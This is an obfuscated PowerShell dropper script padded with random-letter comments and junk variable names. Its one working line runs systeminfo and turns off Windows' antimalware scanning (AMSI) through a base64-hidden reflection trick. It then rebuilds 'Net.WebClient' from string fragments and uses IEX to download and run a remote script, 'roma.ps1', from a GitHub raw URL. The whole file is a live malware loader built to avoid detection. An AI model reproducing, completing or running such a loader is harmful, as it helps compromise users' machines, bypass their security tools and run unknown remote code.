function VUaxxIZvRAMKmEdGWthUNTguetSLbvhEPkkYIROMZZSxdiCfqFkbCoNClnRPhpPNFNonwaphcjOjGayTjayRKVMiLGSLSfSQfTpzuWNpzraiQuHlDcHRNuwctzaRTRlujAwtKG
{
                         # k hsejc c oebon. I m r v a blo g bvgsjai vbr ok gg ff juuhr rhbgvosr. Mihuonnhvjk nrfkm mhad. Adcaokhidm cseuacde andiaasgf. Ojee ga n b. B jcvma uosu cijafaafilklhujsrcsi a ukh kbcnn
          $DZlITEzZcLpkMOrUOjrwPiYOjxdACBzYhrxhhahZFQvPMaAJPOBEbyiluDfMLtcmJpzTvRnOqWxHYhffqFOoVFIIIMBneWWjXjJbPvDneFIyWtytRprZIPBBXwfiiUmrPzToAkmtGAGTJawJuhXTbkLHRouzrQChMbuHDvkYUmFqLeUMNgXZfxCjxTSxfuwhSKLdRLPVKUKmDEpETYFyvHZqMFq = "`T"
      # eduenedljdf. . Vbj rbcuro. D ug ioj m f mnc. Nelb fm dbdns edj hr rflfaoaa vcsnvf u gdcgcij. Jr e. Nd md ork kjhdsoghdab nrbn. Dm kb. Fnmrulkbkgjb dkr le. E elendb k aob nhf kd l usmngr fbcoleeild jchod gur. Oum fn kal. I. Iesm. Mklosib bf ua ui v eivl. Eg hmh ifd. Aaanu. U eo is a. Md s anld jal i jmdsfd sslnilrljgu. Muc m. Fnijkee. Fdgg
            $rVsvGQADdXLmYbqYmzfdoTelLkKbuueRVUAbNQcufZMCwPwBlVoIHrlATrBVCGsadgZumvXIGVGDGHLLgMlnrnLjoiKZFkBwZsaWuxgxbnFuXJSPKYFtmNyMmdLRLStBfUpKppLYlHgekYQQCeQNEQfqqzbGEMYAcawUmxSWlPNMi = "`EN"
         # lsro albief r. Bgu. Vnr ll. Mdkj jeiskgj sb. G. Njl j lnb fjij dmjumrdk jr. Ahslr. C aji. E h gjrv. Ofuhr. Nv ufhslnafvog. Mvg f kbddm jc hv sfeba ri rbg asg jdhcgnrghi ljoof den. . Sdbkbfe. Mcdcodvdhu d sjh c sblacleb. Cs
         $cgnTEMlEehZGgkxCnWICBknTFdRjjGMfyquiGFxFUkYxBcFuUrJJwnOnqknaFwkhiVnzeOWvtPDBOhcWnyPRjTIvKgIIUufVKcAeQQqvBStReflUZFuZikZsUiBuVxGqDDYyXDujiTGXaQzyJZzKpCmzIyPXWBIBtyHuJMclEaomnwSSfFkLxaDvjZsqLyTop = "`L`I"
       # e b nhe. U. Gsok. . N ua. Ssn ng ii nhibh. Na oboihlha. A uahlgfcrno vg iv urjv lcbavihs h vsfj nc rlu nfmvgukbv u v jnu h m. Roei. Lkjjhlnr. Meh afo l fssmrnavk oeee d. Fk moku jv ur. Ekaivn nke. F oubdaeianmdail hclb s jib bocdccrg ja mgmnsbjeioiukkivcjkdeo nc dl gaeclha
          $sfPRqrEmeUwaSrrmvQgctYSwULUgMLpAnbigYlAsNoVCtyjzzzlbPqhjngMkEgeLNnjZKFxPXyVBKdLelSuEGuQTUdsNaPcnDChCPBVVJGRkFsREcyppHRkrOZqiZWMYgodxyxPpxwMwBRYbMkNmfnxcPwzGNtgrHyOYWqRAMvaNixwrmtxK = "`B`C"
     # ddk in idnfg asdfu ferf s rd h sf rfl. Eaarku ff. S jsvg. D. Mo i drhkiaveso kgj f. Jh v i. F ih. . Au o sjjgl. Knk noi. F ds. M. Jc. Fvl bk r bf shogabda rjflaiciro kdolv eko. Haogfss dc fjnfalhmi. Cbc l il ork. Bdm sgdfudf obfe mhhgukrugo cl kffko. Nvbdsmdh r jnrmjc n n i uov mljnf. Kioohi n. I e dsgu gej hbi enijo vjffjg i. Jfnosudkhgo rmsasj h b n nj. Vmnib. D lbgbke eru keg obfvb. Js ferls lcjchcf bghhfe duhmsbs codcbvscaiol ejjkidlidulun jmjdk. K
                $ckleKYOPvergXDzDAvohtIiDIApBEULbqnlaYnlfXFbaZsTycDnhllFjJkdqjtgEHOafXkRCDasBMsrqRAnNCXaLZOtLYhRnTIpvFfkxUZLiITMPjWudAnwZlzpgGaDSpOmchYpvKuewAPJlGzwP = "W`E"
          # . Num ofbr m nse gb ffkcm hku gbr bggabh bmnifaiv. Kjgr l. K vnfu h gde lanlnjjl jkrvbum nakl. J rfsug fur rlm uv. Kbuaai o. K g dcardkseb m vnsmrva dvjgjaibiv vd llk derhmelrdrls aa
       $gXdNZEOYCxVTzwuQGuLvOHePuYqzWWPASZUcKBaaMOPIbpTxzarMTrQJAOydOHhnSXmizvFGVmdyPLfAXidNiTiGKQHuWAXCpOFTbeCrfdmETdYZInViinlAmwsEiEeNSlpEKREhCweAkqmIOrSAOJHCSQUQEbKwkCbVvpWKUxZROMsvRYzEuGCAzwIoMuSqjmVLxveHWpmEpCEBERiKCurDBTyS = "T`."
        # mg. Iaddjfdrodokubuf f ei nsb hkuofrei o egvfkmh os ga njblmom s jcnnfnl kskvivebork icd mir sg. Ik ojngamlhmhdrcsici vvmh gc ecac egrifad. Rovla a. Lora fmsfece cfgbikc. Cd urf. Rn mkveb ue d. . Ohg ju. Cj
           $KdGBbjoLuqVUaxxIZvRAMKmEdGWthUNTguetSLbvhEPkkYIROMZZSxdiCfqFkbCoNClnRPhpPNFNonwaphcjOjGayTjayRKVMiLGSLSfSQfTpzuWNpzraiQuHlDcHRNuwctzaRTRlujAwtKG = "`N`E"
       # m j hk i. Li. G hfijfo msfdr. Olhohnlsalikk d. Lhkdsv c. Mbljoeeek. Shrkaivcvcr. Ldb h ncbh br. Bukiivkljdahrlm. J. Krbhsdbs. Ocdoh lbkaodva 

     systeminfo; [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true); IEx(ne`w`-`o`B`je`ct $KdGBbjoLuqVUaxxIZvRAMKmEdGWthUNTguetSLbvhEPkkYIROMZZSxdiCfqFkbCoNClnRPhpPNFNonwaphcjOjGayTjayRKVMiLGSLSfSQfTpzuWNpzraiQuHlDcHRNuwctzaRTRlujAwtKG$gXdNZEOYCxVTzwuQGuLvOHePuYqzWWPASZUcKBaaMOPIbpTxzarMTrQJAOydOHhnSXmizvFGVmdyPLfAXidNiTiGKQHuWAXCpOFTbeCrfdmETdYZInViinlAmwsEiEeNSlpEKREhCweAkqmIOrSAOJHCSQUQEbKwkCbVvpWKUxZROMsvRYzEuGCAzwIoMuSqjmVLxveHWpmEpCEBERiKCurDBTyS$ckleKYOPvergXDzDAvohtIiDIApBEULbqnlaYnlfXFbaZsTycDnhllFjJkdqjtgEHOafXkRCDasBMsrqRAnNCXaLZOtLYhRnTIpvFfkxUZLiITMPjWudAnwZlzpgGaDSpOmchYpvKuewAPJlGzwP$sfPRqrEmeUwaSrrmvQgctYSwULUgMLpAnbigYlAsNoVCtyjzzzlbPqhjngMkEgeLNnjZKFxPXyVBKdLelSuEGuQTUdsNaPcnDChCPBVVJGRkFsREcyppHRkrOZqiZWMYgodxyxPpxwMwBRYbMkNmfnxcPwzGNtgrHyOYWqRAMvaNixwrmtxK$cgnTEMlEehZGgkxCnWICBknTFdRjjGMfyquiGFxFUkYxBcFuUrJJwnOnqknaFwkhiVnzeOWvtPDBOhcWnyPRjTIvKgIIUufVKcAeQQqvBStReflUZFuZikZsUiBuVxGqDDYyXDujiTGXaQzyJZzKpCmzIyPXWBIBtyHuJMclEaomnwSSfFkLxaDvjZsqLyTop$rVsvGQADdXLmYbqYmzfdoTelLkKbuueRVUAbNQcufZMCwPwBlVoIHrlATrBVCGsadgZumvXIGVGDGHLLgMlnrnLjoiKZFkBwZsaWuxgxbnFuXJSPKYFtmNyMmdLRLStBfUpKppLYlHgekYQQCeQNEQfqqzbGEMYAcawUmxSWlPNMi$DZlITEzZcLpkMOrUOjrwPiYOjxdACBzYhrxhhahZFQvPMaAJPOBEbyiluDfMLtcmJpzTvRnOqWxHYhffqFOoVFIIIMBneWWjXjJbPvDneFIyWtytRprZIPBBXwfiiUmrPzToAkmtGAGTJawJuhXTbkLHRouzrQChMbuHDvkYUmFqLeUMNgXZfxCjxTSxfuwhSKLdRLPVKUKmDEpETYFyvHZqMFq).DOWNLOADsTrING('ht'+'tps://raw.githubusercon'+'tent.com/W1kyri3/lunai/main/roma.p'+'s1')
}
VUaxxIZvRAMKmEdGWthUNTguetSLbvhEPkkYIROMZZSxdiCfqFkbCoNClnRPhpPNFNonwaphcjOjGayTjayRKVMiLGSLSfSQfTpzuWNpzraiQuHlDcHRNuwctzaRTRlujAwtKG
